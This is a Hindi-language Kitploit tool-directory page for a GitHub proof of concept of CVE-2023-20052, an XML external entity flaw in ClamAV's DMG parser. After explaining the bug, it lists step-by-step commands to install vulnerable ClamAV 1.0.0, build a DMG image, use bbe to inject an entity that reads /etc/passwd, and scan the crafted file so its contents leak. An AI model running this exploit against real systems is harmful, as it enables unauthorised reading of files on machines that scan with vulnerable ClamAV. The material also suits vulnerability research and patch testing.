Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-20052 — CVE-2023-20052 ClamAV के DMG फ़ाइल पार्सर में सूचना लीक भेद्यता | Kitploit
उपकरण/GitHubGitHub/cy83rr0h1t/cve-2023-20052
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनामालवेयर विश्लेषण
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 ClamAV के DMG फ़ाइल पार्सर में सूचना लीक भेद्यता

रिपॉजिटरी देखें
183 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-20052

CVE-2023-20052 ClamAV के DMG फ़ाइल पार्सर में सूचना रिसाव की भेद्यता
ClamAV संस्करण 1.0.0 और उससे पहले, 0.105.1 और उससे पहले, और 0.103.7 और उससे पहले के DMG फ़ाइल पार्सर में एक भेद्यता एक अप्रमाणित, दूरस्थ हमलावर को प्रभावित डिवाइस पर संवेदनशील जानकारी तक पहुँचने की अनुमति दे सकती है। यह भेद्यता XML एंटिटी प्रतिस्थापन को सक्षम करने के कारण है जिसके परिणामस्वरूप XML बाहरी एंटिटी इंजेक्शन हो सकता है। एक हमलावर प्रभावित डिवाइस पर ClamAV द्वारा स्कैन किए जाने के लिए एक गढ़ा हुआ DMG फ़ाइल प्रस्तुत करके इस भेद्यता का शोषण कर सकता है। एक सफल शोषण हमलावर को ClamAV स्कैनिंग प्रक्रिया द्वारा पढ़ी जा सकने वाली किसी भी फ़ाइल से बाइट्स लीक करने की अनुमति दे सकता है।

Ubuntu 20.04 में परीक्षण किया गया

ClamAV संस्करण 1.0.0 कैसे स्थापित करें

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

5

  • clamscan --version
    6

इस शोषण के लिए कुछ और चीजें स्थापित करना।

  • apt-get update

  • apt-get install -y ca-certificates gnupg wget

  • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

  • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

  • apt-get update -y

  • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
    7

  • git clone https://github.com/planetbeing/libdmg-hfsplus.git
    8

  • cd /libdmg-hfsplus

  • cmake .
    9

  • make
    10

  • cp dmg/dmg /bin
    sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
    11

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

  • clamscan --debug exploit2.dmg 13

Reference: https://github.com/nokn0wthing/CVE-2023-20052

टूल डाउनलोड करें